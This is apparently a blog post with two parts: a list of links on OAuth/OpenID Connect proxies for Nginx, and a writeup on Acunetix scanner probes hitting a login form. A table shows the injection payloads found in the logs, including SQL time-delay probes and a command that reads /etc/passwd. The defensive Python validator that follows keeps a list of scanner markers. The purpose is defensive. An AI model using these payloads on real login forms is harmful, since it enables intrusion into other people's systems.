Category: Hacking, Security, Vulnerabilities
[Linkset] Authorization termination: OAuth reverse proxy
UPDATE: Nginx Plus was released today with a new nginx-openid-connect module.
If you are looking for an authentication server or an OAuth library, the OpenID Connect implementations page is a good place to start. I chose Keycloak, but I also want to look at FreeIPA or https://ipsilon-project.org
There is also the Keycloak Security Proxy, but I want the proxy as an Nginx module and I need to implement something non-standard.
There is also an OpenID/Keycloak proxy service: https://github.com/gambol99/keycloak-proxy
For Apache web server everything is clear:
https://github.com/zmartzone/mod_auth_openidc
But I need something for Nginx.
lua-resty-openidc (and its intro blog post) is written in Lua, so it is easier to extend (which I did to implement a custom grant flow, sessions and reference tokens).
https://github.com/tarachandverma/nginx-openidc is written fully in C++, which is interesting because you don't need to enable Lua in Nginx (believe me, this can be harmful).
Also interesting is a module with only one purpose: using reference tokens (opaque tokens):
https://github.com/curityio/nginx_phantom_token_module is written in C, so there is no need for additional dependencies.
Authentication Based on Subrequest Result
Actually Nginx already has something that can satisfy 80% of your needs:
https://docs.nginx.com/nginx/admin-guide/security-controls/configuring-subrequest-authentication/
https://www.nginx.com/blog/nginx-plus-authenticate-users/
http://nginx.org/en/docs/http/ngx_http_auth_request_module.html
https://github.com/nginxinc/nginx-ldap-auth
https://redbyte.eu/en/blog/using-the-nginx-auth-request-module/
https://news.ycombinator.com/item?id=7641148
But to use subrequest auth, your auth server must support it, or you need to set up another shim proxy:
https://github.com/bitly/oauth2_proxy
and here is a Docker container which integrates it: https://github.com/sinnerschrader/oauth-proxy-nginx
Or you can use this one, which is written in Lua:
https://github.com/jirutka/ngx-oauth
Bonus:
An important article from security researcher Egor Homakov, who hacked GitHub and Facebook several times:
Acunetix Web Vulnerability Scanner
One of my customers suffered a DDoS attack and the site went down.
In the logs I found a lot of login requests with non-existent usernames, and some of the usernames contained exploit payloads such as SQL, JavaScript and command-line injections.
For example:
username | what it tests
--- | ---
admin | tries to log in as admin
"+response.write(9016645*9728826)+" | JavaScript injection
(select convert(int,CHAR(65))) | SQL injection
waitfor delay '0:0:4' | do we have MSSQL?
and (sleep(4)+1) limit 1 | or MySQL?
cat /etc/passwd;' | Linux/BSD? tries to read the password file
^(#$!@#$)(()))* | Perl? (interpreting)
;print(md5(acunetix_wvs_security_test)); | checks for the PEAR XML_RPC 1.3.0 vulnerability in PHP
The list of exploits is below, but please don't open any of the links, since they contain exploits too.
Analysis of the payloads showed that this attack was performed by the Acunetix Web Vulnerability Scanner.
In short, this is just a robot that crawls your site and tests for known security issues.
Even if your site were vulnerable, the scanner would not try to break anything, but it would report the vulnerabilities to the attacker.
Each time a login is performed, the site tries to look up a user with that username in the DB and, when it is not found, returns a NoSuchUserException. That creates a big load on the DB.
So we add to our login a simple validation that the username does not contain any special symbols or spaces, and return NoSuchUserException without any DB lookup.
That will minimize the database load on the next attack. It would also be good to write a security alert to the logs.
Another simple step to prevent this kind of attack is to avoid usernames like «admin», «user», «test» and similar.
List of exploits (please note that they have a randomly generated part):
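As an added illustration of the pre-validation described above (example code, not from the original post): a login lookup that rejects malformed usernames syntactically before any database query, raises the same NoSuchUserException as for an unknown user, and writes a security alert to the log. The allowed character set and the scanner-marker substrings are assumptions chosen for this example.

```python
import logging
import re
from typing import Optional

log = logging.getLogger("auth")

# Allow-list for well-formed usernames (assumption: letters, digits, '.', '_', '-', 1..64 chars).
# Widen it deliberately if your usernames are e-mail addresses (add '@'), never the other way round.
VALID_USERNAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Constructed substrings taken from the scanner payloads shown on this page, used only to label alerts.
SCANNER_MARKERS = ("acunetix", "response.write(", "waitfor delay", "sleep(", "/etc/passwd", "nslookup ", "win.ini", "web-inf")


class NoSuchUserException(Exception):
    pass


def classify_username(username: str) -> Optional[str]:
    """Reason to reject the name before touching the DB, or None if it is well-formed."""
    if VALID_USERNAME.match(username):
        return None
    lowered = username.lower()
    if any(marker in lowered for marker in SCANNER_MARKERS):
        return "scanner-payload"
    return "invalid-chars"


class LoginService:
    def __init__(self) -> None:
        # Constructed in-memory stand-in for the real user table.
        self._users = {"alice": "alice@example.tst", "bob": "bob@example.tst"}
        self.db_lookups = 0  # how often the (expensive) lookup actually ran

    def find_user(self, username: str) -> str:
        reason = classify_username(username)
        if reason is not None:
            # Same outcome as an unknown user, so the response does not leak which rule fired,
            # but the database is never queried and the event is recorded as a security alert.
            log.warning("security alert: rejected username (%s): %r", reason, username[:80])
            raise NoSuchUserException(username)
        self.db_lookups += 1
        if username not in self._users:
            raise NoSuchUserException(username)
        return self._users[username]

    def attempt_login(self, username: str) -> bool:
        try:
            self.find_user(username)
            return True
        except NoSuchUserException:
            return False
```

A well-formed probe such as «admin» still reaches the database, which is why the advice to avoid such account names matters alongside the syntactic check.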
See also:
* https://eventespresso.com/tag/acunetix_wvs_security_test/
* https://www.fail2ban.org/
* https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
* https://www.modsecurity.org/